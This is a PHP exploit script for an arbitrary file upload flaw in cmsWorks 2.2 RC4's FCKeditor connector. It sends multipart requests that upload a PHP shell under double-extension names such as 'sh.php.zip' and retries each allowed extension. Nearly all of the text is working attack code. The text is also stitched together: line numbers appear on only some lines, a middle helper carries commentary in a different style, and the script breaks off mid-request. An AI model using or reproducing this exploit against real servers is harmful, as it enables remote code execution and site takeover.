1 <?php
2 /*
3 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
4 cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit
5 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
6 discovered by Stack
7 exploited by ..: EgiX
8 special thnx to EgiX
9 details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
10
11 [−] vulnerable code in path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php
12
13 121. //File Area
14 122. $fckphp_config['ResourceAreas']['File'] =array(
15 123.
16 124. //Files(identified by extension) that may be uploaded to this area
17 125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
18
19 with the default configuration of this script, an attacker might be able to upload arbitrary
20 files containing malicious PHP code, because file names with multiple extensions aren't properly checked
21 */
// Script-wide runtime settings. Order matters only in that the first call
// silences any diagnostics the later ones might raise.
error_reporting(0);                      // suppress all warnings/notices
set_time_limit(0);                       // no execution-time cap for the script
ini_set('default_socket_timeout', 5);    // seconds before socket calls give up
/**
 * Open a TCP connection to port 80 on $host, write $packet verbatim and
 * return whatever the peer sends back until it closes the connection.
 *
 * Behaviour worth knowing before reusing this helper:
 *  - fsockopen() is retried in an unbounded loop with no delay or attempt
 *    cap, so an unreachable host makes this spin forever (printing one line
 *    per attempt); the caller never receives a failure result.
 *  - $packet is written as-is: no HTTP framing, encoding or validation.
 *  - The fwrite()/fread() return values are not inspected, so a short or
 *    failed write is silent.
 *  - The response accumulator starts as null; if the peer sends no bytes
 *    before EOF the function returns null rather than ''.
 *
 * @param string $host   hostname or IP passed straight to fsockopen()
 * @param string $packet raw request bytes to write to the socket
 * @return string|null   raw response bytes, or null when nothing was read
 */
function http_send($host, $packet)
{
    // Keep dialling until a socket handle comes back; there is no attempt
    // limit, back-off or error surface here.
    for ($sock = fsockopen($host, 80); !$sock; $sock = fsockopen($host, 80)) {
        print "\n[−] No response from {$host}:80 Trying again...";
    }

    fwrite($sock, $packet);

    // Drain the socket in 1 KiB chunks until the peer closes it.
    $response = null;
    while (!feof($sock)) {
        $response .= fread($sock, 1024);
    }
    fclose($sock);

    return $response;
}
38 function upload()
39 {
40 global $host, $path;
41
42 $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
43 $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
44
45 foreach ($file_ext as $ext)
46 {
47 print "\n[−] Trying to upload with .{$ext} extension...";
48
49 $data = "−−12345\r\n";
50 $data .= "Content−Disposition: form−data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
51 $data .= "Content−Type: